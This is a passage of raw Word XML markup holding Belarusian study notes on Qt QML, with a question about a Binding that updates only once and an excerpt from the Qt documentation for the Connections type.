        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00411F4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">Я хацеў, каб абнаўлялася каардыната прамавугльніка кожны раз, як я націскаю па ім кнопку пацука. Але ў мяне абнаўленне здараецца толькі адзін раз… </w:t>
      </w:r>
      <w:r w:rsidR="00411F4F" w:rsidRPr="00411F4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>чаму?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00411F4F" w:rsidRPr="00411F4F" w:rsidRDefault="00411F4F" w:rsidP="0041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be-BY" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00411F4F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="800080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Binding</w:t>
      </w:r>
      <w:r w:rsidRPr="00411F4F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="be-BY" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00411F4F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="808000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidRPr="00411F4F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="be-BY" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00411F4F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="800000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00411F4F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="be-BY" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00411F4F" w:rsidRPr="00411F4F" w:rsidRDefault="00411F4F" w:rsidP="0041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411F4F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="be-BY" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00411F4F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="800000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>when</w:t>
      </w:r>
      <w:r w:rsidRPr="00411F4F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00411F4F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00411F4F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2985C7"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>mouse</w:t>
      </w:r>
      <w:r w:rsidRPr="00411F4F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.pressed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00411F4F" w:rsidRPr="00411F4F" w:rsidRDefault="00411F4F" w:rsidP="0041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411F4F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00411F4F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="800000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00411F4F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00411F4F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00411F4F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>blackRect</w:t>
      </w:r>
      <w:r w:rsidRPr="00411F4F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.x</w:t>
      </w:r>
      <w:r w:rsidRPr="00411F4F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00411F4F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00411F4F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00411F4F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00411F4F" w:rsidRPr="002736BE" w:rsidRDefault="00411F4F" w:rsidP="0041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2736BE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00411F4F" w:rsidRDefault="00411F4F" w:rsidP="00605F34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Нейкі цыкл адбываецца. Гэта і ясна. Бо ўласцівасць пачынае бясконца абнаўляцца. Але рэалізацыю байндзінга я не да канца разумею…</w:t>
      </w:r>
      <w:r w:rsidR="00A50E12">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A50E12" w:rsidRDefault="00A50E12" w:rsidP="00605F34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>// тут была праблема з фокусам //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00411F4F" w:rsidRPr="00411F4F" w:rsidRDefault="00411F4F" w:rsidP="00605F34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00411F4F" w:rsidRDefault="00490E7E" w:rsidP="00605F34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1517" w:history="1">
        <w:r w:rsidR="00CD28D1" w:rsidRPr="00AD5879">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http</w:t>
        </w:r>
        <w:r w:rsidR="00CD28D1" w:rsidRPr="00411F4F">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:r w:rsidR="00CD28D1" w:rsidRPr="00AD5879">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>doc</w:t>
        </w:r>
        <w:r w:rsidR="00CD28D1" w:rsidRPr="00411F4F">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00CD28D1" w:rsidRPr="00AD5879">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="00CD28D1" w:rsidRPr="00411F4F">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00CD28D1" w:rsidRPr="00AD5879">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>io</w:t>
        </w:r>
        <w:r w:rsidR="00CD28D1" w:rsidRPr="00411F4F">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="00CD28D1" w:rsidRPr="00AD5879">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="00CD28D1" w:rsidRPr="00411F4F">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-5/</w:t>
        </w:r>
        <w:r w:rsidR="00CD28D1" w:rsidRPr="00AD5879">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qml</w:t>
        </w:r>
        <w:r w:rsidR="00CD28D1" w:rsidRPr="00411F4F">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="00CD28D1" w:rsidRPr="00AD5879">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qtqml</w:t>
        </w:r>
        <w:r w:rsidR="00CD28D1" w:rsidRPr="00411F4F">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="00CD28D1" w:rsidRPr="00AD5879">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>connections</w:t>
        </w:r>
        <w:r w:rsidR="00CD28D1" w:rsidRPr="00411F4F">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00CD28D1" w:rsidRPr="00AD5879">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00CD28D1" w:rsidRPr="00A50E12" w:rsidRDefault="00CD28D1" w:rsidP="00A50E12">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1231" w:name="_Toc483000787"/>
      <w:bookmarkStart w:id="1232" w:name="_Toc483003785"/>
      <w:bookmarkStart w:id="1233" w:name="_Toc483604139"/>
      <w:bookmarkStart w:id="1234" w:name="_Toc483605359"/>
      <w:r w:rsidRPr="00A50E12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Connections QML Type</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1231"/>
      <w:bookmarkEnd w:id="1232"/>
      <w:bookmarkEnd w:id="1233"/>
      <w:bookmarkEnd w:id="1234"/>
    </w:p>
    <w:p w:rsidR="00CD28D1" w:rsidRPr="00CD28D1" w:rsidRDefault="00CD28D1" w:rsidP="00A50E12">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1235" w:name="_Toc483000788"/>
      <w:bookmarkStart w:id="1236" w:name="_Toc483003786"/>
      <w:bookmarkStart w:id="1237" w:name="_Toc483604140"/>
      <w:bookmarkStart w:id="1238" w:name="_Toc483605360"/>
      <w:r w:rsidRPr="00A50E12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Detailed Description</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1235"/>
      <w:bookmarkEnd w:id="1236"/>
      <w:bookmarkEnd w:id="1237"/>
      <w:bookmarkEnd w:id="1238"/>
    </w:p>
    <w:p w:rsidR="00CD28D1" w:rsidRPr="00CD28D1" w:rsidRDefault="00CD28D1" w:rsidP="00CD28D1">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">A Connections object </w:t>
      </w:r>
      <w:r w:rsidRPr="003C682E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>creates a connection to a QML signal</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD28D1" w:rsidRPr="00CD28D1" w:rsidRDefault="00CD28D1" w:rsidP="00CD28D1">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">When connecting to signals in QML, the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C682E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usual</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> way is to create an "</w:t>
      </w:r>
      <w:r w:rsidRPr="003C682E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>on&lt;Signal&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>" handler that reacts when a signal is received, like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD28D1" w:rsidRPr="00CD28D1" w:rsidRDefault="00490E7E"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518" w:history="1">
        <w:r w:rsidR="00CD28D1" w:rsidRPr="00CD28D1">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MouseArea</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00CD28D1" w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CD28D1" w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD28D1" w:rsidRPr="00CD28D1" w:rsidRDefault="00CD28D1"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D28D1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    onClicked</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> foo</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>parameters</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rStyle w:val="pun"/>
